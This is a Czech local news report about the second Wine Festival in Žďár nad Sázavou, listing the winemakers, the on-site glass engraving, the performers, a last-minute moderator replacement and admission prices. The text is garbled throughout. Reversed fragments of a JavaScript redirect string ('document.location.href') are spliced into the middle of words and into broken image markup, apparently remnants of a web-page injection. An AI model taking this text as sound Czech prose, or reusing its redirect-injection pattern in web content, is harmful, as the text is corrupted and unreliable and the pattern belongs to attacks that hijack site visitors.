Rainbow page separator

Druhý žďárský Festival vína nabídne 300 druhů od 20 vinařů

Pátek, 29. března 2019

Žďár nad Sázavou / Ojedinělou možnost nechat si přímo na místě vybrousit skleničku podle svého přání budou moci využít návštěvníci v pořadí už druhého Festivalu vína, který se 30. března od 13 do 19 hodin uskuteční ve žďárském Domě kultury. „Přizvali jsme ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát ke spolupráci také firmu Broušené sklo Jana a Pavel Smetanovi z Radešínské Svratky. Doufáme, že lidem nabídka na ruční vybroušení skleničky udělá radost,“ přiblížila za pořadatele akce Pavlína Mokrá.
[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-2.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-2.jpg“ alt=““ width=“200″ height=“133″>Poslední březnovou sobotu budou moci zájemci v Domě kultury ochutnávat celkem 300 druhů vína od dvou desítek vinařů z Čech, Moravy i zahraničí, o stylovou výzdobu sálu se postarají studenty oboru aranžér ze žďárské obchodní školy. Degustaci kvalitních vín doprovodí žďárská Horácká muzika a o folklorní vstup se v průběhu odpoledne hned několikrát postará dětský folklorní soubor Studánka ze Žďáru nad Sázavou. Druhý ročník Festivalu vína slovem uvede moderá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor Hitrádia Vysočina Pavel Bláha, jenž na pódiu nahradí zpěváka a muzikanta Jožku Šmukaře, který se z již předjednané akce musel omluvit, neboť právě 30. března bude v Praze přebírat medaili za zásluhy v kultuře.
[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-3.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-3.jpg“ alt=““ width=“200″ height=“133″>Stejně jako loni zájemci nebudou vína pouze ochutnávat, ale za předpokladu, že jim některé z nich zachutná více než ostatní, mohou si ho zakoupit domů. A pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože pít se nemá na lačný žaludek, připraveno bude nejenom občerstvení vhodné k vínu, ale pro milovníky sladkého rovněž zákusky a improvizovaná kavárna. Vstupné na Festival vína vyjde na 150 korun, záloha na degustační skleničku činí 50 korun a ceny degustačních vzorků vín se budou pohybovat podle nabídky jednotlivých vinařů.

Akci finančně podpořilo Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou